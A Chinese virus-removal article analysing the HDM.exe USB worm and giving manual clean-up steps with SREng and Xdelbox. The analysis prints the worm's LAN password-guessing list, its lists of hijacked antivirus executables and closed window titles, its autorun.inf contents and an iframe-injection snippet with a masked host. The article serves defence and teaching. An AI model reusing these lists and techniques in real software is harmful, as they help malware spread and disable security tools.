HDM.exe手工查杀U盘病毒的方法
HDM.exe手工查杀U盘病毒的方法
发布时间:2017-01-06 来源:查字典编辑
摘要:HDM.exe是一个恶性的U盘病毒,其破坏力巨大,主要表现在以下几个方面:Quote:1.使用恢复SSDT的方式破坏杀毒软件2.IFEO映像...

HDM.exe是一个恶性的U盘病毒,其破坏力巨大,主要表现在以下几个方面:

Quote:

1.使用恢复SSDT的方式破坏杀毒软件

2.IFEO映像劫持

3.关闭指定窗口

4.删除gho文件

5.破坏安全模式,以及显示隐藏文件功能

6.感染htm等网页文件

7.猜测密码通过局域网传播

8.通过U盘等移动存储传播

9.arp欺骗

具体分析如下:

Quote:

File:HDM.exe

Size:13312bytes

Modified:2007年11月28日,16:52:08

MD5:7EC36FA2BCFC1EA72C26B74C928C78F6

SHA1:B60048A8F9DB67EDF4B94BFE4DA2A1906CD33B59

CRC32:88D8970A

技术细节:

1.病毒运行后,释放如下文件以及副本:

Quote:

C:WINDOWSsystem32Winlogon.dll

C:RESSDT.sys

遍历所有磁盘分区在磁盘根目录下写入HDM.exe和autorun.inf以达到通过U盘等移动存储传播的目的

同时建立服务RESSDT

服务相关描述:

启动类型:手动

映像文件路径:c:RESSDT.sys"

显示名称:"RESSDT"

之后加载该驱动该驱动能够使得某些杀毒软件的APIhook失效

2.释放一个GetIp.bat到病毒所在目录下,从而获得IP地址

3.利用ping命令探测同一网段内的其他机器,并把结果写入c:EnumHost.txt

4.如果查找到同一网段内的其他机器,则通过枚举用户名和密码的方式将HDM.exe复制到其他机器的C,D,E,F盘的根目录下

枚举的用户名和密码如下:

Quote:

home

movie

alex

love

xp

123

administrator

new

guest

user

game

time

yeah

money

xpuser

123456

qwerty

abc123

memory

12345678

88888

5201314

1314520

asdfgh

angel

asdf

baby

woaini

之后会利用获得当前机器的时间并利用at命令定时启动该病毒

5.获得系统目录,下载http://*/arp.exe和http://*/winpcap.exe

到系统目录下面

winpcap.exe是嗅探器

arp.exe具有arp欺骗功能,可以向局域网中的其它机器的80端口加入http://www.*/wm.htm的iframe代码

6.遍历磁盘所有分区下面的html,htm,asp,aspx,php,jsp文件

在其尾部加入<iframesrc=http://www.*/wm.htmwidth=0height=0></iframe>的代码

7.遍历所有磁盘分区删除gho文件

8.在softwaremicrosoftwindowsntcurrentversionimagefileexecutionoptions下面添加IFEO项目,劫持某些杀毒软件

Quote:

360rpt.exe

360Safe.exe

360tray.exe

adam.exe

AgentSvr.exe

AppSvc32.exe

autoruns.exe

avgrssvc.exe

AvMonitor.exe

avp.com

avp.exe

CCenter.exe

ccSvcHst.exe

FileDsty.exe

FrameworkServices.exe

FTCleanerShell.exe

HijackThis.exe

IceSword.exe

iparmo.exe

Iparmor.exe

isPwdSvc.exe

kabaload.exe

KaScrScn.SCR

KASMain.exe

KASTask.exe

KAV32.exe

KAVDX.exe

KAVPFW.exe

KAVSetup.exe

KAVStart.exe

KISLnchr.exe

KMailMon.exe

KMFilter.exe

kmp.exe

KPFW32.exe

KPFW32X.exe

KPFWSvc.exe

KRegEx.exe

KRepair.COM

KsLoader.exe

KVCenter.kxp

KvDetect.exe

KvfwMcl.exe

KVMonXP.kxp

KVMonXP_1.kxp

kvol.exe

kvolself.exe

KvReport.kxp

KVScan.kxp

KVSrvXP.exe

KVStub.kxp

kvupload.exe

kvwsc.exe

KvXP.kxp

KvXP_1.kxp

KWatch.exe

KWatch9x.exe

KWatchX.exe

loaddll.exe

MagicSet.exe

mcconsol.exe

Mcshield.exe

mmqczj.exe

mmsk.exe

MPMon.exe

MPSVC.exe

MPSVC1.exe

MPSVC2.exe

naPrdMgr.exe

NAVSetup.exe

nod32krn.exe

nod32kui.exe

PFW.exe

PFWLiveUpdate.exe

QHSET.exe

Ras.exe

Rav.exe

RavMon.exe

RavMonD.exe

RavStub.exe

RavTask.exe

RegClean.exe

regedit.exe

rfwcfg.exe

RfwMain.exe

rfwProxy.exe

rfwsrv.exe

RsAgent.exe

Rsaupd.exe

runiep.exe

safelive.exe

scan32.exe

shcfg32.exe

shstat.exe

SmartUp.exe

SREng.exe

SWEEP95.exe

symlcsvc.exe

SysSafe.exe

Tbmon.exe

TBSCAN.exe

TERegPct.exe

TrojanDetector.exe

Trojanwall.exe

TrojDie.kxp

UIHost.exe

UmxAgent.exe

UmxAttachment.exe

UmxCfg.exe

UmxFwHlp.exe

UmxPol.exe

UpdateUI.exe

UpLive.EXE.exe

VsTskMgr.exe

WEBSCANX.exe

WoptiClean.exe

ZONEALARM.exe

zxsweep.exe

_AVP32.EXE

_AVPCC.EXE

_AVPM.EXE

9.将HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALLCheckedValue的值改为0x00000001破坏显示隐藏文件

10.删除systemcurrentcontrolsetcontrolsafebootnetwork

和systemcurrentcontrolsetcontrolsafebootminimal键

破坏安全模式

11.查找指定窗口的名称,并将其关闭

Quote:

安全卫士

扫描

专杀

注册表

process

进程

木马

防御

防火墙

病毒

检测

firewall

virus

anti

金山

江民

卡巴斯基

worm

杀毒

12.启动c:programfilesinternetexploreriexplore.exe下载木马

下载http://www.*/1.exe~http://www.*/6.exe

到temp文件夹下面分别命名为downfile.exe~downfile5.exe

其中的1.exe又是一个木马下载器,它可以下载很多木马,但测试中并未植入成功...

13.同时在HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun下面添加注册表项目

<calc.exe><%SystemRoot%system32calc.exe>使得calc.exe开机启动但不知具体有什么作用...

14.在HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurrentVersionWinlogonNotifyWinlogon下面添加注册表项目

<WinlogonNotify:Winlogon><C:WINDOWSsystem32Winlogon.dll>[]

15.病毒体内有文字:“nofixups!”“justtest!”

全部木马和病毒植入完毕后的sreng日志如下:

启动项目

Quote:

注册表

HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun

<calc.exe><%SystemRoot%system32calc.exe>[(Verified)MicrosoftWindowsPublisher]

<Cifmon><C:WINDOWSsystem32Server.EXE>[]

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurrentVersionWinlogonNotifyWinlogon]

<WinlogonNotify:Winlogon><C:WINDOWSsystem32Winlogon.dll>[]

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurrentVersionImageFileExecutionOptions360rpt.exe]

<IFEO[360rpt.exe]><C:HDM.exe>[]

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurrentVersionImageFileExecutionOptions360Safe.exe]

<IFEO[360Safe.exe]><C:HDM.exe>[]...

==================================

驱动程序

[RASAsynchronousMediaDriver/AsyncMac][Stopped/AutoStart]

<system32DRIVERScomint32.sys><N/A>

[MS/MS][Stopped/ManualStart]

<??C:DOCUME~1NEWCEN~1LOCALS~1Temptmp13.tmp><N/A>

[RESSDT/RESSDT][Stopped/ManualStart]

<??c:RESSDT.sys><N/A>

[usbmouseb/usbmouseb][Running/ManualStart]

<??C:WINDOWSSYSTEM32driverssmbins.sys><N/A>

==================================

正在运行的进程

[PID:1148][C:ProgramFilesInternetExploreriexplore.exe][MicrosoftCorporation,6.00.2900.2180(xpsp_sp2_rtm.040803-

2158)]

[C:WINDOWSsystem32Insert.dll][N/A,]

[PID:1428][C:WINDOWSexplorer.exe][MicrosoftCorporation,6.00.2900.2180(xpsp_sp2_rtm.040803-2158)]

[C:WINDOWSSYSTEM32smbins.dll][MicrosoftCorporation,5,0,2195,3649]

==================================

Autorun.inf

[C:]

[AutoRun]

OPEN=HDM.exe

shellopen=打开(&O)

shellopenCommand=HDM.exe

shellopenDefault=1

shellexplore=资源管理器(&X)

shellexplorecommand=HDM.exe

[D:]

[AutoRun]

OPEN=HDM.exe

shellopen=打开(&O)

shellopenCommand=HDM.exe

shellopenDefault=1

shellexplore=资源管理器(&X)

shellexplorecommand=HDM.exe

某些木马没有植入成功,所以无法体现

解决方法:

下载sreng和Xdelbox

1.解压Xdelbox所有文件到一个文件夹

在添加旁边的框中分别输入

%systemroot%system32DRIVERScomint32.sys

%systemroot%system32Server.EXE

%systemroot%system32Winlogon.dll

c:RESSDT.sys

%systemroot%system32driverssmbins.sys

%systemroot%system32Insert.dll

%systemroot%SYSTEM32smbins.dll

输入完一个以后点击旁边的添加按钮被添加的文件将出现在下面的大框中

然后一次性选中(按住ctrl)下面大框中所有的文件

右键单击点击重启立即删除

卸载winpcap.exe软件

2.重启计算机后

打开sreng

启动项目注册表删除如下项目

HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun

<calc.exe><%SystemRoot%system32calc.exe>[(Verified)MicrosoftWindowsPublisher]

<Cifmon><C:WINDOWSsystem32Server.EXE>[]

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurrentVersionWinlogonNotifyWinlogon]

<WinlogonNotify:Winlogon><C:WINDOWSsystem32Winlogon.dll>[]

删除所有红色的IFEO项目

在“启动项目”-“服务”-“驱动程序”中点“隐藏经认证的微软项目”,

选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否”:

Quote:

[RASAsynchronousMediaDriver/AsyncMac][Stopped/AutoStart]

<system32DRIVERScomint32.sys><N/A>

[MS/MS][Stopped/ManualStart]

<??C:DOCUME~1NEWCEN~1LOCALS~1Temptmp13.tmp><N/A>

[RESSDT/RESSDT][Stopped/ManualStart]

<??c:RESSDT.sys><N/A>

[usbmouseb/usbmouseb][Running/ManualStart]

<??C:WINDOWSSYSTEM32driverssmbins.sys><N/A>

系统修复-WindowsShell/IE全选点击修复

系统修复-高级修复-修复安全模式

双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹"并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示确定更改时,单击“是”然后确定

点击菜单栏下方的文件夹按钮(搜索右边的按钮)

在左边的资源管理器中单击打开所有磁盘分区

分别删除其根目录下的HDM.exe和autorun.inf

3.修复被感染的网页文件

推荐使用iframkill

截至到目前,还没有一个杀毒软件报出这个病毒

由于这是一个比较恶性的病毒,一旦流行开来后果将不堪设想,因此希望大家做好以下工作防范类似病毒出现

1.打全系统补丁,及时升级杀毒软件和防火墙并打开实时监控功能

2.给系统设定一个复杂的密码

3.关闭自动播放,阻止类似通过U盘传播的病毒的侵入

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新病毒查杀学习
热门病毒查杀学习
实用技巧子分类